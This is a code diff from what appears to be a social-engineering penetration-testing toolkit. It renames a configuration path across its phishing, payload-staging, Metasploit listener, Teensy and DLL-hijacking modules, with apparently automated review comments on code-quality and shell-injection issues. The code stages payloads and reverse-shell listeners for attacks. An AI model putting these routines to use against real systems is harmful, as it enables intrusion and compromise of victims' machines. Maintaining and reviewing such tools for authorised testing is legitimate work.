@@ -350,7 +350,7 @@ def web_server_start(): if apache == 1: subprocess.Popen("cp %s/src/html/*.bin %s 1> /dev/null 2> /dev/null;cp %s/src/html/*.html %s 1> /dev/null 2> /dev/null;cp %s/web_clone/* %s 1> /dev/null 2> /dev/null;cp %s/msf.exe %s 1> /dev/null 2> /dev/null;cp %s/*.jar %s 1> /dev/null 2> /dev/null" % - (definepath, apache_path, definepath, apache_path, setdir, apache_path, setdir, apache_path, setdir, apache_path), shell=True).wait() + (definepath, apache_path, definepath, apache_path, userconfigpath, apache_path, userconfigpath, apache_path, userconfigpath, apache_path), shell=True).wait() # if we are tracking users if track_email == "on": now = datetime.datetime.today() @@ -395,15 +395,15 @@ web_server = check_config("WEB_PORT=") # setup multi attack options here multiattack = "off" -if os.path.isfile(setdir + "/multi_tabnabbing"): +if os.path.isfile(userconfigpath + "multi_tabnabbing"): multiattack = "on" -if os.path.isfile(setdir + "/multi_harvester"): +if os.path.isfile(userconfigpath + "multi_harvester"): multiattack = "on" # Grab custom or set defined template = "" -if os.path.isfile(setdir + "/site.template"): - fileopen = open(setdir + "/site.template", "r").readlines() +if os.path.isfile(userconfigpath + "site.template"): + fileopen = open(userconfigpath + "site.template", "r").readlines() for line in fileopen: line = line.rstrip() match = re.search("TEMPLATE=", line) @@ -532,8 +532,8 @@ try: print(( bcolors.GREEN + "[--] Apache web server is currently in use for performance. [--]" + bcolors.ENDC)) - if os.path.isfile(setdir + "/meta_config"): - fileopen = open(setdir + "/meta_config", "r") + if os.path.isfile(userconfigpath + "meta_config"): + fileopen = open(userconfigpath + "meta_config", "r") for line in fileopen: line = line.rstrip() match = re.search("set SRVPORT 80", line) 
@@ -550,8 +550,8 @@ try: web_server_start() # if we are using ettercap - if os.path.isfile(setdir + "/ettercap"): - fileopen5 = open(setdir + "/ettercap", "r") + if os.path.isfile(userconfigpath + "ettercap"): + fileopen5 = open(userconfigpath + "ettercap", "r") for line in fileopen5: ettercap = line.rstrip() # run in background @@ -561,7 +561,7 @@ try: stderr=subprocess.PIPE, stdout=subprocess.PIPE) # if metasploit config is in directory - if os.path.isfile(setdir + "/meta_config"): + if os.path.isfile(userconfigpath + "meta_config"): print_info("Launching MSF Listener...") print_info("This may take a few to load MSF...") # this checks to see if we want to start a listener @@ -573,12 +573,12 @@ try: import pexpect # specify if we are using the multi pyinjector meta_config = "meta_config" - if os.path.isfile(setdir + "/meta_config_multipyinjector"): + if os.path.isfile(userconfigpath + "meta_config_multipyinjector"): meta_config = "meta_config_multipyinjector" # if we arent using a custom payload if custom != 1: child1 = pexpect.spawn( - "%smsfconsole -r %s/%s\r\n\r\n" % (msf_path, setdir, meta_config)) + "%smsfconsole -r %s/%s\r\n\r\n" % (msf_path, userconfigpath, meta_config)) # check if we want to deliver emails or track users that click the # link webattack_email = check_config("WEBATTACK_EMAIL=").lower() @@ -592,11 +592,11 @@ try: if custom != 1: child1.interact() - if os.path.isfile(setdir + "/set.payload"): + if os.path.isfile(userconfigpath + "set.payload"): port = check_options("PORT=") # grab configuration - fileopen = open(setdir + "/set.payload", "r") + fileopen = open(userconfigpath + "set.payload", "r") for line in fileopen: set_payload = line.rstrip() 
@@ -627,12 +627,12 @@ try: # if not then run it in windows if operating_system == "windows": - if not os.path.isfile(setdir + "/ratteserver.exe"): + if not os.path.isfile(userconfigpath + "ratteserver.exe"): shutil.copyfile( - "../../payloads/ratte/ratteserver.binary", setdir + "/ratteserver.exe") + "../../payloads/ratte/ratteserver.binary", userconfigpath + "ratteserver.exe") shutil.copyfile( - "../../payloads/ratte/cygwin1.dll", setdir + "/cygwin1.dll") - os.system(setdir + "/ratteserver %s" % (definepath, port)) + "../../payloads/ratte/cygwin1.dll", userconfigpath + "cygwin1.dll") + os.system(userconfigpath + "ratteserver %s" % (definepath, port)) # handle errors except Exception as e: diff --git a/src/payloads/powershell/prep.py b/src/payloads/powershell/prep.py index 4ee945471..71cb0e081 100644 --- a/src/payloads/powershell/prep.py +++ b/src/payloads/powershell/prep.py @@ -26,7 +26,7 @@ auto_migrate = check_config("AUTO_MIGRATE=") pyinjection = check_options("PYINJECTION=") if pyinjection == "ON": # check to ensure that the payload options were specified right - if os.path.isfile(setdir + "/payload_options.shellcode"): + if os.path.isfile(userconfigpath + "payload_options.shellcode"): pyinjection = "on" print_status( "Multi/Pyinjection was specified. Overriding config options.") @@ -56,7 +56,7 @@ if validate_ip(ipaddr) == False: # prompt what port to listen on for powershell then make an append to the current # metasploit answer file -if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): +if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)): # if we have multi injection on, don't worry about these if multi_injection != "on": if pyinjection == "off": 
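Review bot: `os.system(userconfigpath + "ratteserver %s" % (definepath, port))` formats one `%s` with a two-element tuple, so it raises TypeError before anything is launched; `%` also binds tighter than `+`, so the path is prepended only after formatting, which is harmless here but easy to misread. If the server takes only the port, `subprocess.call([os.path.join(userconfigpath, "ratteserver"), str(port)])` avoids both the format error and shell interpretation of the path, in line with the two copyfile calls above it that already use userconfigpath directly. The enclosing try block begins outside the hunk, so whether this TypeError is currently swallowed by the `except Exception as e:` that follows cannot be judged here.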
@@ -66,12 +66,12 @@ if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): ["4"], "Enter the port for Metasploit to listen on for powershell [443]")) if port == "": port = "443" - fileopen = open("%s/meta_config_multipyinjector" % (setdir), "r") + fileopen = open("%s/meta_config_multipyinjector" % (userconfigpath), "r") data = fileopen.read() match = re.search(port, data) if not match: filewrite = open( - "%s/meta_config_multipyinjector" % (setdir), "a") + "%s/meta_config_multipyinjector" % (userconfigpath), "a") filewrite.write("\nuse exploit/multi/handler\n") if auto_migrate == "ON": filewrite.write( @@ -84,7 +84,7 @@ if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): if multi_injection != "on": if pyinjection == "off": # check to see if the meta config multi pyinjector is there - if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): + if not os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)): if check_options("PORT=") != 0: port = check_options("PORT=") # if port.options isnt there then prompt @@ -128,12 +128,12 @@ if multi_injection == "on": generate_powershell_alphanumeric_payload( powershell_inject_x86, ipaddr, ports, x86) - if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): + if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)): port_check = check_ports( - "%s/meta_config_multipyinjector" % (setdir), ports) + "%s/meta_config_multipyinjector" % (userconfigpath), ports) if port_check == False: filewrite = open( - "%s/meta_config_multipyinjector" % (setdir), "a") + "%s/meta_config_multipyinjector" % (userconfigpath), "a") filewrite.write("\nuse exploit/multi/handler\n") if auto_migrate == "ON": filewrite.write( 
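Review bot: The duplicate-handler check `match = re.search(port, data)` in this hunk uses the user-supplied port as a regex pattern and matches it as a substring, so "443" is found inside an existing "4433" entry and the `use exploit/multi/handler` block is skipped; the later hunks (@@ -128, @@ -143) call `check_ports(path, ports)` for the same decision. Reusing that helper here, `port_check = check_ports("%s/meta_config_multipyinjector" % (userconfigpath), port)` followed by `if port_check == False:`, keeps one definition of "port already configured", assuming check_ports accepts a single port as its second argument — its definition is outside this hunk. The surrounding `if multi_injection != "on": if pyinjection == "off":` block begins before the hunk.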
@@ -143,15 +143,15 @@ if multi_injection == "on": filewrite.close() # if we aren't using multi pyinjector - if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): + if not os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)): # if meta config isn't created yet then create it - if not os.path.isfile("%s/meta_config" % (setdir)): - filewrite = open("%s/meta_config" % (setdir), "w") + if not os.path.isfile("%s/meta_config" % (userconfigpath)): + filewrite = open("%s/meta_config" % (userconfigpath), "w") filewrite.write("") filewrite.close() - port_check = check_ports("%s/meta_config" % (setdir), ports) + port_check = check_ports("%s/meta_config" % (userconfigpath), ports) if port_check == False: - filewrite = open("%s/meta_config" % (setdir), "a") + filewrite = open("%s/meta_config" % (userconfigpath), "a") filewrite.write("\nuse exploit/multi/handler\n") if auto_migrate == "ON": filewrite.write( @@ -164,7 +164,7 @@ if multi_injection == "on": if pyinjection == "on": multi_injection_x86 = "" # read in the file we need for parsing - fileopen = open(setdir + "/payload_options.shellcode", "r") + fileopen = open(userconfigpath + "payload_options.shellcode", "r") payloads = fileopen.read()[:-1].rstrip() # strips an extra , payloads = payloads.split(",") # format: payloadport @@ -196,7 +196,7 @@ if verbose.lower() == "on": time.sleep(3) print(x86) -filewrite = open("%s/x86.powershell" % (setdir), "w") +filewrite = open("%s/x86.powershell" % (userconfigpath), "w") filewrite.write(x86) filewrite.close() print_status("Finished generating powershell injection bypass.") diff --git a/src/payloads/set_payloads/listener.py b/src/payloads/set_payloads/listener.py index 61df3f573..19f0f5c96 100755 --- a/src/payloads/set_payloads/listener.py +++ b/src/payloads/set_payloads/listener.py 
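Review bot: prep.py keeps two path conventions after this commit: `userconfigpath + "payload_options.shellcode"` in @@ -164 assumes a trailing separator, while `"%s/meta_config" % (userconfigpath)` here and `"%s/x86.powershell" % (userconfigpath)` in @@ -196 insert one, so at most one of them matches the value of userconfigpath exactly. `os.path.join(userconfigpath, "meta_config")` serves both cases. The `filewrite = open(...)` / `filewrite.close()` pairs in this hunk would be safer as `with open(...) as filewrite:` blocks so the handle is released if a write fails.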
@@ -17,10 +17,10 @@ definepath = os.getcwd() sys.path.append(definepath) # cleanup -if os.path.isfile(setdir + "/uac.address"): - os.remove(setdir + "/uac.address") -if os.path.isfile(setdir + "/system.address"): - os.remove(setdir + "/system.address") +if os.path.isfile(userconfigpath + "uac.address"): + os.remove(userconfigpath + "uac.address") +if os.path.isfile(userconfigpath + "system.address"): + os.remove(userconfigpath + "system.address") # will remove this later core_modules = True @@ -863,9 +863,9 @@ Example: shellcode - Then paste your shellcode \x41\x41\etc time.sleep(0.5) # write out system - if os.path.isfile("%s/system.address" % (setdir)): - os.remove("%s/system.address" % (setdir)) - filewrite = open("%s/system.address" % (setdir), "w") + if os.path.isfile("%s/system.address" % (userconfigpath)): + os.remove("%s/system.address" % (userconfigpath)) + filewrite = open("%s/system.address" % (userconfigpath), "w") filewrite.write(addr) filewrite.close() @@ -882,9 +882,9 @@ Example: shellcode - Then paste your shellcode \x41\x41\etc # had to do some funky stuff here because global vars are not working properly # inside threads, so the information cant be passed to # normal outside routines - if os.path.isfile(setdir + "/uac.address"): - os.remove(setdir + "/uac.address") - filewrite = open(setdir + "/uac.address", "w") + if os.path.isfile(userconfigpath + "uac.address"): + os.remove(userconfigpath + "uac.address") + filewrite = open(userconfigpath + "uac.address", "w") filewrite.write(addr) filewrite.close() 
@@ -1033,9 +1033,9 @@ Example: shellcode - Then paste your shellcode \x41\x41\etc if os.path.isfile("src/payloads/set_payloads/persistence.binary"): if core_modules == True: subprocess.Popen( - "cp src/payloads/set_payloads/persistence.binary %s" % (setdir), shell=True).wait() - upx("%s/persistence.binary" % (setdir)) - upload = "%s/persistence.binary" % (setdir) + "cp src/payloads/set_payloads/persistence.binary %s" % (userconfigpath), shell=True).wait() + upx("%s/persistence.binary" % (userconfigpath)) + upload = "%s/persistence.binary" % (userconfigpath) if core_modules == False: upload = "src/payloads/set_payloads/persistence.binary" @@ -1085,9 +1085,9 @@ Example: shellcode - Then paste your shellcode \x41\x41\etc if os.path.isfile("src/payloads/set_payloads/shell.windows"): if core_modules == True: subprocess.Popen( - "cp src/payloads/set_payloads/shell.windows %s" % (setdir), shell=True).wait() - upx(setdir + "/shell.windows") - upload = setdir + "/shell.windows" + "cp src/payloads/set_payloads/shell.windows %s" % (userconfigpath), shell=True).wait() + upx(userconfigpath + "shell.windows") + upload = userconfigpath + "shell.windows" if core_modules == False: upload = "src/payloads/set_payloads/shell.windows" @@ -1437,8 +1437,8 @@ Example: shellcode - Then paste your shellcode \x41\x41\etc # if we have a windows shell if data == "IHAYYYYYIAMSETANDIAMWINDOWS": - if os.path.isfile(setdir + "/system.address"): - fileopen = open(setdir + "/system.address", "r") + if os.path.isfile(userconfigpath + "system.address"): + fileopen = open(userconfigpath + "system.address", "r") system = fileopen.read().rstrip() system = system.replace(":WINDOWS", "") system = system.replace(":UAC-SAFE", "") 
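Review bot: `subprocess.Popen("cp src/payloads/set_payloads/shell.windows %s" % (userconfigpath), shell=True)` in the `-1085` hunk (and its twin for `persistence.binary` in the `-1033` hunk) interpolates a config-derived directory into a shell command line, so a path containing a space or shell metacharacter copies the wrong thing and the failure is never checked. `shutil.copy("src/payloads/set_payloads/shell.windows", userconfigpath)` performs the same copy without a shell and raises on error. The new lines also alternate between `userconfigpath + "shell.windows"` and `"%s/persistence.binary" % (userconfigpath)`; `os.path.join` would make both independent of whether the directory carries a trailing separator.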
@@ -1446,8 +1446,8 @@ Example: shellcode - Then paste your shellcode \x41\x41\etc temp_addr = str(addr[0] + ":WINDOWS:SYSTEM") bypass_counter = 1 - if os.path.isfile(setdir + "/uac.address"): - fileopen = open(setdir + "/uac.address", "r") + if os.path.isfile(userconfigpath + "uac.address"): + fileopen = open(userconfigpath + "uac.address", "r") uac = fileopen.read().rstrip() uac = uac.replace(":WINDOWS", "") if str(addr[0]) == str(uac): @@ -1479,12 +1479,12 @@ Example: shellcode - Then paste your shellcode \x41\x41\etc # reset value # if uac != None: - if os.path.isfile(setdir + "/uac.address"): - os.remove(setdir + "/uac.address") + if os.path.isfile(userconfigpath + "uac.address"): + os.remove(userconfigpath + "uac.address") bypass_counter = 0 - if os.path.isfile(setdir + "/system.address"): - os.remove(setdir + "/system.address") + if os.path.isfile(userconfigpath + "system.address"): + os.remove(userconfigpath + "system.address") bypass_counter = 0 if addr[0] != "127.0.0.1": diff --git a/src/phishing/smtp/client/smtp_client.py b/src/phishing/smtp/client/smtp_client.py index 8d2265180..e2210c4be 100644 --- a/src/phishing/smtp/client/smtp_client.py +++ b/src/phishing/smtp/client/smtp_client.py 
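Review bot: `fileopen = open(userconfigpath + "uac.address", "r")` in the `-1446` hunk reads the file and never closes it, as does the matching `system.address` read in the `-1437` hunk, so both rely on the garbage collector to release the descriptor inside a connection-handling loop. `with open(os.path.join(userconfigpath, "uac.address")) as fileopen: uac = fileopen.read().rstrip()` fixes it in place. The enclosing handler function starts well before this hunk.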
@@ -109,41 +109,41 @@ print_info( "As an added bonus, use the file-format creator in SET to create your attachment.") counter = 0 # PDF Previous -if os.path.isfile(setdir + "/template.pdf"): - if os.path.isfile(setdir + "/template.rar"): - if os.path.isfile(setdir + "/template.zip"): +if os.path.isfile(userconfigpath + "template.pdf"): + if os.path.isfile(userconfigpath + "template.rar"): + if os.path.isfile(userconfigpath + "template.zip"): print_warning("Multiple payloads were detected:") print ("1. PDF Payload\n2. VBS Payload\n3. Zipfile Payload\n\n") choose_payload = input(setprompt("0", "")) if choose_payload == '1': - file_format = (setdir + "/template.pdf") + file_format = (userconfigpath + "template.pdf") if choose_payload == '2': - file_format = (setdir + "/template.rar") + file_format = (userconfigpath + "template.rar") if choose_payload == '3': - file_format = (setdir + "/template.zip") + file_format = (userconfigpath + "template.zip") counter = 1 if counter == 0: - if os.path.isfile(setdir + "/template.pdf"): - file_format = (setdir + "/template.pdf") - if os.path.isfile(setdir + "/template.rar"): - file_format = (setdir + "/template.rar") - if os.path.isfile(setdir + "/template.zip"): - file_format = (setdir + "/template.zip") - if os.path.isfile(setdir + "/template.doc"): - file_format = (setdir + "/template.doc") - if os.path.isfile(setdir + "/template.rtf"): - file_format = (setdir + "/template.rtf") - if os.path.isfile(setdir + "/template.mov"): - file_format = (setdir + "/template.mov") + if os.path.isfile(userconfigpath + "template.pdf"): + file_format = (userconfigpath + "template.pdf") + if os.path.isfile(userconfigpath + "template.rar"): + file_format = (userconfigpath + "template.rar") + if os.path.isfile(userconfigpath + "template.zip"): + file_format = (userconfigpath + "template.zip") + if os.path.isfile(userconfigpath + "template.doc"): + file_format = (userconfigpath + "template.doc") + if os.path.isfile(userconfigpath + "template.rtf"): 
+ file_format = (userconfigpath + "template.rtf") + if os.path.isfile(userconfigpath + "template.mov"): + file_format = (userconfigpath + "template.mov") # Determine if prior payload created -if not os.path.isfile(setdir + "/template.pdf"): - if not os.path.isfile(setdir + "/template.rar"): - if not os.path.isfile(setdir + "/template.zip"): - if not os.path.isfile(setdir + "/template.doc"): - if not os.path.isfile(setdir + "/template.rtf"): - if not os.path.isfile(setdir + "/template.mov"): +if not os.path.isfile(userconfigpath + "template.pdf"): + if not os.path.isfile(userconfigpath + "template.rar"): + if not os.path.isfile(userconfigpath + "template.zip"): + if not os.path.isfile(userconfigpath + "template.doc"): + if not os.path.isfile(userconfigpath + "template.rtf"): + if not os.path.isfile(userconfigpath + "template.mov"): print("No previous payload created.") file_format = input( setprompt(["1"], "Enter the file to use as an attachment")) @@ -175,8 +175,8 @@ if filename1 == '1' or filename1 == '': if filename1 == '2': filename1 = input(setprompt(["1"], "New filename")) subprocess.Popen("cp %s %s/%s 1> /dev/null 2> /dev/null" % - (file_format, setdir, filename1), shell=True).wait() - file_format = ("%s/%s" % (setdir, filename1)) + (file_format, userconfigpath, filename1), shell=True).wait() + file_format = ("%s/%s" % (userconfigpath, filename1)) print_status("Filename changed, moving on...") print (""" @@ -210,7 +210,7 @@ if option1 == '1' or option1 == '2': if template_choice == '1': # set path for path = 'src/templates/' - filewrite = open(setdir + "/email.templates", "w") + filewrite = open(userconfigpath + "email.templates", "w") counter = 0 # Pull all files in the templates directory for infile in glob.glob(os.path.join(path, '*.template')): 
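Review bot: In the `-109` hunk, when all three templates exist and the operator answers anything other than `1`, `2` or `3` at the "Multiple payloads were detected" prompt, `file_format` is not assigned (unless it was set earlier in the script, which the hunk does not show) yet `counter = 1` still skips the fallback chain, so the copy in the `-175` hunk fails with a NameError. A lookup such as `choices = {"1": "template.pdf", "2": "template.rar", "3": "template.zip"}` followed by `file_format = os.path.join(userconfigpath, choices.get(choose_payload, "template.pdf"))` keeps a defined value, though the intended default should be confirmed. The `if counter == 0:` chain below it silently picks the last template found, which deserves at least a `print_warning`.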
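Review bot: `subprocess.Popen("cp %s %s/%s 1> /dev/null 2> /dev/null" % (file_format, userconfigpath, filename1), shell=True)` in the `-175` hunk builds a shell command from two operator-typed strings (`filename1` from the "New filename" prompt and, when no prior payload exists, `file_format` from the attachment prompt), so a value containing a space or `;` runs something else and the redirects hide the failure. `shutil.copy(file_format, os.path.join(userconfigpath, filename1))` followed by `file_format = os.path.join(userconfigpath, filename1)` does the same without a shell and surfaces a missing source file as an exception instead of a silent no-op.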
@@ -223,7 +223,7 @@ if option1 == '1' or option1 == '2':
 # close the file
 filewrite.close()
 # read in formatted filenames
-fileread = open(setdir + "/email.templates", "r").readlines()
+fileread = open(userconfigpath + "email.templates", "r").readlines()
 print_info("Available templates:")
 for line in fileread:
 line = line.rstrip()
@@ -459,31 +459,31 @@ if option1 == '2': email_num = email_num + 1 print(" Sent e-mail number: " + (str(email_num))) -if not os.path.isfile(setdir + "/template.zip"): +if not os.path.isfile(userconfigpath + "template.zip"): print_status("SET has finished delivering the emails") question1 = yesno_prompt(["1"], "Setup a listener [yes|no]") if question1 == 'YES': - if not os.path.isfile(setdir + "/payload.options"): - if not os.path.isfile(setdir + "/meta_config"): - if not os.path.isfile(setdir + "/unc_config"): + if not os.path.isfile(userconfigpath + "payload.options"): + if not os.path.isfile(userconfigpath + "meta_config"): + if not os.path.isfile(userconfigpath + "unc_config"): print_error( "Sorry, you did not generate your payload through SET, this option is not supported.") - if os.path.isfile(setdir + "/unc_config"): + if os.path.isfile(userconfigpath + "unc_config"): child = pexpect.spawn( - "%smsfconsole -r %s/unc_config" % (meta_path, setdir)) + "%smsfconsole -r %s/unc_config" % (meta_path, userconfigpath)) try: child.interact() except Exception: child.close() - if os.path.isfile(setdir + "/payload.options"): - fileopen = open(setdir + "/payload.options", "r").readlines() + if os.path.isfile(userconfigpath + "payload.options"): + fileopen = open(userconfigpath + "payload.options", "r").readlines() for line in fileopen: line = line.rstrip() line = line.split(" ") # CREATE THE LISTENER HERE - filewrite = open(setdir + "/meta_config", "w") + filewrite = open(userconfigpath + "meta_config", "w") filewrite.write("use exploit/multi/handler\n") filewrite.write("set PAYLOAD " + line[0] + "\n") filewrite.write("set LHOST " + line[1] + "\n") @@ -493,7 +493,7 @@ if not os.path.isfile(setdir + "/template.zip"): filewrite.write("exploit -j\r\n\r\n") filewrite.close() child = pexpect.spawn( - "%smsfconsole -r %s/meta_config" % (meta_path, setdir)) + "%smsfconsole -r %s/meta_config" % (meta_path, userconfigpath)) try: child.interact() except Exception: 
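Review bot: The `pexpect.spawn("%smsfconsole -r %s/unc_config" % (meta_path, userconfigpath))` line in the `-459` hunk glues `meta_path` to the binary name with no separator while inserting one after `userconfigpath`, so the two settings require opposite trailing-slash conventions. `os.path.join(meta_path, "msfconsole")` and `os.path.join(userconfigpath, "unc_config")` work either way, and the `meta_config` spawn in the `-493` hunk has the same shape. The `if question1 == 'YES':` branch continues past the end of the hunk.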
diff --git a/src/teensy/binary2teensy.py b/src/teensy/binary2teensy.py index 54151d081..46ceeb463 100644 --- a/src/teensy/binary2teensy.py +++ b/src/teensy/binary2teensy.py @@ -308,24 +308,24 @@ Keyboard.send_now(); }""" % (random_filename,random_filename,powershell_command,vbs,bat,vbs,vbs,random_filename,alpha_payload,bat,vbs)) # delete temporary file subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" % (random_filename), shell=True).wait() -if not os.path.isdir(setdir + "reports"): os.makedirs(setdir + "reports") -print_status("Binary to Teensy file exported as %sreports/binary2teensy" % (setdir)) +if not os.path.isdir(userconfigpath + "reports"): os.makedirs(userconfigpath + "reports") +print_status("Binary to Teensy file exported as %sreports/binary2teensy" % (userconfigpath)) # write the teensy.ino file out -filewrite = file(setdir + "reports/binary2teensy.ino", "w") +filewrite = file(userconfigpath + "reports/binary2teensy.ino", "w") # write the teensy.ino file out filewrite.write(output_variable) # close the file filewrite.close() print_status("Generating a listener...") # create our metasploit answer file -filewrite = file(setdir + "answer.txt", "w") +filewrite = file(userconfigpath + "answer.txt", "w") filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\n%s\nexploit -j" % (payload,ipaddr,port,url)) filewrite.close() # spawn a multi/handler listener -subprocess.Popen("msfconsole -r %sanswer.txt" % (setdir), shell=True).wait() +subprocess.Popen("msfconsole -r %sanswer.txt" % (userconfigpath), shell=True).wait() print_status("[*] Housekeeping old files...") # if our answer file is still there (which it should be), then remove it -if os.path.isfile(setdir + "answer.txt"): +if os.path.isfile(userconfigpath + "answer.txt"): # remove the old file, no longer used once we've exited - subprocess.Popen("rm " + setdir + "answer.txt", shell=True).wait() + subprocess.Popen("rm " + userconfigpath + "answer.txt", shell=True).wait() 
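Review bot: `subprocess.Popen("rm " + userconfigpath + "answer.txt", shell=True)` at the end of the `-308` hunk spawns a shell to delete one configuration-derived file; `os.remove(userconfigpath + "answer.txt")` inside the existing `isfile` guard does it without a shell, and the same concern applies to `msfconsole -r %sanswer.txt`, which breaks on a directory containing a space. The hunk also keeps `file(...)` for both writes, a builtin that exists only on Python 2, while other files in this patch use `print(...)`/`input(...)` forms that read as Python 3 — worth confirming which interpreter this module targets, since `open(...)` works on both.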
diff --git a/src/teensy/teensy.py b/src/teensy/teensy.py index 410865e9e..692654783 100644 --- a/src/teensy/teensy.py +++ b/src/teensy/teensy.py @@ -29,7 +29,7 @@ now = datetime.datetime.today() if operating_system != "windows": import pexpect -# check to see if setdir is created +# check to see if userconfigpath is created if not os.path.isdir(os.path.join(core.userconfigpath, "reports")): os.makedirs(os.path.join(core.userconfigpath, "reports")) @@ -84,7 +84,7 @@ with open(os.path.join(core.userconfigpath, "teensy")) as fileopen: def writefile(filename, now): with open(os.path.join("src/teensy/" + filename)) as fileopen, \ - open(os.path.join(core.userconfigpath, "/reports/teensy_{0}.ino".format(now)), "w") as filewrite: + open(os.path.join(core.userconfigpath, "reports/teensy_{0}.ino".format(now)), "w") as filewrite: for line in fileopen: match = re.search("IPADDR", line) diff --git a/src/webattack/browser_exploits/gen_payload.py b/src/webattack/browser_exploits/gen_payload.py index 8d97d3d0f..77630efa0 100644 --- a/src/webattack/browser_exploits/gen_payload.py +++ b/src/webattack/browser_exploits/gen_payload.py @@ -13,15 +13,15 @@ port = "" # see if multi_attack is being used and prep everything we need multiattack = "off" webdav_enabled = "off" -if os.path.isfile(setdir + "/multi_payload"): +if os.path.isfile(userconfigpath + "multi_payload"): multiattack = "on" # just need a simple filewrite to generate a file if webdav is enabled # this is used for multi attack, it will write out file to program junk # then a simple check will determine if webdav is enabled for the port webdav_enabled = "off" - webdav_write = open(setdir + "/webdav_enabled", "w") + webdav_write = open(userconfigpath + "webdav_enabled", "w") - fileopen = open(setdir + "/multi_payload", "r") + fileopen = open(userconfigpath + "multi_payload", "r") for line in fileopen: match = re.search("MAIN=", line) if match: 
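Review bot: `webdav_write = open(userconfigpath + "webdav_enabled", "w")` in gen_payload.py's `-13` hunk creates the flag file, but the handle is neither written to nor closed anywhere in the hunk; multiattack.py in this same patch only tests the file with `os.path.isfile`, so `open(os.path.join(userconfigpath, "webdav_enabled"), "w").close()` states the intent and releases the descriptor. The `fileopen = open(userconfigpath + "multi_payload", "r")` just below it is likewise not closed in the hunk; a `with` block around the `for line in fileopen:` loop fixes that.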
@@ -60,8 +60,8 @@ for line in configfile: # grab attack vector attack_vector = "" -if os.path.isfile(setdir + "/attack_vector"): - fileopen = open(setdir + "/attack_vector") +if os.path.isfile(userconfigpath + "attack_vector"): + fileopen = open(userconfigpath + "attack_vector") for line in fileopen: attack_vector = line.rstrip() @@ -107,10 +107,10 @@ if multiattack == "off": port = "443" # check to see if we need to use the multi attack vector in java -if not os.path.isfile(setdir + "/multi_java"): - filewrite = open(setdir + "/meta_config", "w") -if os.path.isfile(setdir + "/multi_java"): - filewrite = open(setdir + "/meta_config", "a") +if not os.path.isfile(userconfigpath + "multi_java"): + filewrite = open(userconfigpath + "meta_config", "w") +if os.path.isfile(userconfigpath + "multi_java"): + filewrite = open(userconfigpath + "meta_config", "a") filewrite.write("use " + exploit + "\n") filewrite.write("set PAYLOAD " + choice1 + "\n") @@ -160,10 +160,10 @@ filewrite.write("set ExitOnSession false\n") # if we are using multiple meterpreter multiscripts if meterpreter_multi == "ON": - multiwrite = open(setdir + "/multi_meter.file", "w") + multiwrite = open(userconfigpath + "multi_meter.file", "w") multiwrite.write(meterpreter_multi_command) filewrite.write( - "set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (setdir)) + "set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (userconfigpath)) multiwrite.close() # auto migration @@ -180,6 +180,6 @@ if webdav_enabled == "on": # this basically sets a flag we need to make some custom changes in web_server.py to get # the docbase exploit to work properly if exploit == ("windows/browser/java_docbase_bof"): - filewrite = open(setdir + "/docbase.file", "w") + filewrite = open(userconfigpath + "docbase.file", "w") filewrite.write("DOCBASE=ON") filewrite.close() diff --git a/src/webattack/dll_hijacking/hijacking.py b/src/webattack/dll_hijacking/hijacking.py index a906e7d1e..89e7b9f2d 100644 
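Review bot: The `-107` hunk tests `os.path.isfile(userconfigpath + "multi_java")` twice in a row to choose between `"w"` and `"a"`; a single `mode = "a" if os.path.isfile(os.path.join(userconfigpath, "multi_java")) else "w"` followed by `filewrite = open(os.path.join(userconfigpath, "meta_config"), mode)` reads more clearly and removes the window between the two checks. `filewrite` is written to throughout the `-160` hunk and presumably closed later outside this chunk, so converting it to a `with` block is a larger change than this commit.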
--- a/src/webattack/dll_hijacking/hijacking.py +++ b/src/webattack/dll_hijacking/hijacking.py @@ -60,7 +60,7 @@ for line in fileopen: print("\n [*] You have selected the file extension of %s and vulnerable dll of %s" % (extension, dll)) # prep the directories -subprocess.Popen("mkdir " + setdir + "/dll", stdout=subprocess.PIPE, +subprocess.Popen("mkdir " + userconfigpath + "dll", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() filename1 = input(setprompt( ["2", "15"], "Enter the filename for the attack (example:openthis) [openthis]")) @@ -68,7 +68,7 @@ if filename1 == "": filename1 = "openthis" # move the files there using the correct extension and file type -filewrite = open(setdir + "/dll/%s%s" % (filename1, extension), "w") +filewrite = open(userconfigpath + "dll/%s%s" % (filename1, extension), "w") filewrite.write("EMPTY") filewrite.close() @@ -82,7 +82,7 @@ else: fileopen = open("src/webattack/dll_hijacking/hijacking.dll", "rb") data = fileopen.read() -filewrite = open(setdir + "/dll/%s" % (dll), "wb") +filewrite = open(userconfigpath + "dll/%s" % (dll), "wb") host = int(len(ipaddr) + 1) * "X" @@ -127,7 +127,7 @@ if choice == "1": # we get a hit? if match: subprocess.Popen("cd %s/dll;rar a %s/template.rar * 1> /dev/null 2> /dev/null" % - (setdir, setdir), shell=True).wait() + (userconfigpath, userconfigpath), shell=True).wait() counter = 1 # if we didnt find rar 
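Review bot: `subprocess.Popen("mkdir " + userconfigpath + "dll", ..., shell=True)` in the `-60` hunk shells out to create one directory and discards both output and error; `dll_dir = os.path.join(userconfigpath, "dll")` with `if not os.path.isdir(dll_dir): os.makedirs(dll_dir)` does the same in-process and is safe for a path containing spaces. The `filename1` read immediately after is used unchanged as a file name in the `-68` hunk, so a value such as `../x` escapes the `dll` directory — tolerable for an operator-only prompt, but `os.path.basename(filename1)` closes it at no cost.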
